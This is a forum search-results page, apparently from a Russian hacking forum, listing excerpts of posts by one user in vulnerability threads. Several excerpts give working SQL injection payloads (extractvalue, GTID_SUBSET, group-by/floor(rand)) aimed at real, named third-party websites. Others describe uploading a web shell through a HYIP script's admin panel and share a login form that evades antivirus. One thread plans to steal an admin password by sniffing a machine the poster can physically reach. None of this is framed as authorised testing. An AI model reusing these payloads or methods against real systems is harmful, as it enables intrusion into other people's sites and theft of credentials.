 |
 |
 | |
 | |
| |
 |
 |
FORUMS | |
MEMBERS | |
RECENT POSTS |  |
LOG IN |
|
||||||
|
Показано с 1 по 25 из 444.
На поиск затрачено 0.01 сек. Поиск: Сообщения от: Ereee |
Раздел: Задания/Квесты/CTF/Конкурсы
17.02.2019, 12:20
|
|
Ответов: 43
Просмотров: 40,308
Автор
Ereee
@crlf (https://antichat.live/members/285197/)...@crlf (https://antichat.live/members/285197/) действительно хайповая тема оказывается |
|
Раздел: Веб-уязвимости
08.02.2019, 08:53
|
|
Ответов: 52
Просмотров: 22,282
Автор
Ereee
Расшифровка логина и пароля в cookie pmaUser-1 и...Расшифровка логина и пароля в cookie pmaUser-1 и pmaPass-1 Когда вход в phpMyAdmin осуществляется через ISPManager, сервер возвращает такие заголовки: ... |
|
Раздел: Уязвимости
09.12.2018, 19:28
|
|
Ответов: 2,955
Просмотров: 1,004,571
Автор
Ereee
|
|
Раздел: Уязвимости
26.04.2018, 03:00
|
|
Ответов: 2,955
Просмотров: 1,004,571
Автор
Ereee
Отправляй через POST. Там видимо...Отправляй через POST. Там видимо $_REQUEST['news_id']. http://www.alphaonenow.org/story.php POST: news_id = 4341 and GTID_SUBSET((SELECT database()),0)-- a Слово "select" хорошо фильтруется,... |
|
Раздел: Веб-уязвимости
03.12.2017, 01:35
|
|
Ответов: 90
Просмотров: 27,626
Автор
Ereee
PAM HYIP
Сайт:http://www.pamhyip.com/
...PAM HYIP Сайт:http://www.pamhyip.com/ Версия:2014 Заливка шелла в админке (/admin/) Tools -> Banners. Таблица админов admin(колонки email, password). Алгоритм md5. Полностью дырявый скрипт,... |
|
Раздел: Уязвимости
08.03.2017, 13:01
|
|
Ответов: 2,955
Просмотров: 1,004,571
Автор
Ereee
Вот здесь есть PoC:
...Вот здесь есть PoC: http://ropchain.org/poc/wordpress/ Суть в том, что plupload позволяет выполнять действия от имени админа, если выполнено несколько условий. |
|
Раздел: Песочница
09.02.2017, 14:16
|
|
Ответов: 5
Просмотров: 2,100
Автор
Ereee
Если 128 сайтов на серваке, то возможно...Если 128 сайтов на серваке, то возможно shared-хостинг, где сидят адовые админы. Шансов в этом случае нет. Но один IP так же может быть у antiddos-сервисов. Для этого выяви настоящий айпи сайта за... |
|
Раздел: Уязвимости
05.02.2017, 17:25
|
|
Ответов: 2,955
Просмотров: 1,004,571
Автор
Ereee
Да, ты прав, прозевал.
Да, boolean-based....Да, ты прав, прозевал. Да, boolean-based. Т.е. blind sql injection. Сейчас попробую добиться вывода. UPD: Очень странное поведение. НЕ удалость вывести у меня. |
|
Раздел: Уязвимости
05.02.2017, 08:16
|
|
Ответов: 2,955
Просмотров: 1,004,571
Автор
Ereee
Пробуй union-based, если не получится - Blind...Пробуй union-based, если не получится - Blind SQLi. |
|
Раздел: Уязвимости
04.02.2017, 19:32
|
|
Ответов: 2,955
Просмотров: 1,004,571
Автор
Ereee
|
|
Раздел: Уязвимости
24.08.2016, 15:30
|
|
Ответов: 2,955
Просмотров: 1,004,571
Автор
Ereee
Включил SSH, вырубился Telnet. SSH тоже не...Включил SSH, вырубился Telnet. SSH тоже не работает. Прогуглив узнал, что прошивка у этих моделей бажная. Так что все, кто встретят такие модели - поосторожней. Все равно спасибо! |
|
Раздел: Песочница
24.08.2016, 02:25
|
|
Ответов: 2
Просмотров: 2,140
Автор
Ereee
С таким подходом, могу посоветовать только этот...С таким подходом, могу посоветовать только этот код: die(); |
|
Раздел: Песочница
20.08.2016, 11:12
|
|
Ответов: 3
Просмотров: 2,396
Автор
Ereee
Думаю ТС путается в выражениях из-за неопытности....Думаю ТС путается в выражениях из-за неопытности. А если не так, то точно есть более адекватное решение, чем запретить пользователю БД запрещать UNION(ALL). |
|
Раздел: Уязвимости
19.08.2016, 09:03
|
|
Ответов: 2,955
Просмотров: 1,004,571
Автор
Ereee
Есть доступ к модему в сети A. В сети A есть...Есть доступ к модему в сети A. В сети A есть SQL-сервер, который подключения с чужих IP не принимает. Модель модема в сети A - APC7932. Возможно ли поднять прокси/etc. на модеме, чтобы подключиться к... |
|
Раздел: Уязвимости
16.08.2016, 08:06
|
|
Ответов: 2,955
Просмотров: 1,004,571
Автор
Ereee
Легко и просто:
...Легко и просто: http://www.byggecentrum.dk/kurser/kursuskategorier/handling/list/produkter/sortering/%60name%60,extractvalue(0x0a,concat(0x0a,(select+version())))--+g/?no_cache=1 Только там с... |
|
Раздел: Избранное
21.12.2015, 01:22
|
|
Ответов: 572
Просмотров: 39,505
Автор
Ereee
|
|
Раздел: Песочница
21.12.2015, 00:58
|
|
Ответов: 9
Просмотров: 4,021
Автор
Ereee
Вот мой вариант:
...Вот мой вариант: http://pastebin.com/5MJmbTvE Ай-болитом, тем более АВ не палит(л)ся. P.S. Там поле ввода пароля по середине, найдете в общем |
|
Раздел: Песочница
08.07.2014, 05:54
|
|
Ответов: 5
Просмотров: 6,301
Автор
Ereee
Может PHPSESSID генерируется с использованим...Может PHPSESSID генерируется с использованим User-Agent и т.д. и т.п. Попробуй полностью спарсить то, что отправляет браузер и через --headers отправить. |
|
Раздел: Уязвимости
08.07.2014, 03:40
|
|
Ответов: 1
Просмотров: 8,085
Автор
Ereee
0. INTRO
Все началось вот с этой темы...0. INTRO Все началось вот с этой темы (https://antichat.live/threads/414402/). Мне нужен был сниффер, чтобы украсть пароль от админки, имея физический доступ к компьютеру. Эту тему статьей не... |
|
Раздел: Песочница
07.07.2014, 02:30
|
|
Ответов: 3
Просмотров: 3,670
Автор
Ereee
|
|
Раздел: Песочница
06.07.2014, 12:09
|
|
Ответов: 3
Просмотров: 3,670
Автор
Ereee
Спасибо за варианты. Но отправка на email думаю...Спасибо за варианты. Но отправка на email думаю не прокатит, сеть внутреняя(сайт, бухгалтерия и т.д.) Hooker заинтересовал, но опять же в логе будет очень много мусора. |
|
Раздел: Песочница
06.07.2014, 10:24
|
|
Ответов: 3
Просмотров: 3,670
Автор
Ereee
Имеется: физический доступ к компьютеру с Windows...Имеется: физический доступ к компьютеру с Windows XP. Во внутренней сети есть админка управления сайтом. Компьютер защищен антивирусом Касперского, но так как есть физ. доступ - это не проблема. ... |
|
Раздел: Песочница
05.07.2014, 19:00
|
|
Ответов: 5
Просмотров: 6,301
Автор
Ereee
После авторизации будет передаваться хидер, типа:...После авторизации будет передаваться хидер, типа: Authorization: Basic YWRtaW46YWRtaW4 Где YWRtaW46YWRtaW4=admin:admin. Соответственно, нужно использовать что-то типа: |
|
Раздел: Уязвимости
30.06.2014, 20:06
|
|
Ответов: 16,037
Важно: SQL Инъекции
Просмотров: 1,118,714
Автор
Ereee
http://www.post[nogoogle]roi.ru/postform/?nproj=q-...http://www.post[nogoogle]roi.ru/postform/?nproj=q-020-2d'or+1+group+by+concat((select+version()), floor(rand(0)*2))+having+min(0)--+a |
|
Раздел: Уязвимости
25.06.2014, 22:04
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 663,691
Автор
Ereee
Возможно MySQL крутится на другом сервере, а сайт...Возможно MySQL крутится на другом сервере, а сайт на другом. |
| Показано с 1 по 25 из 444. |
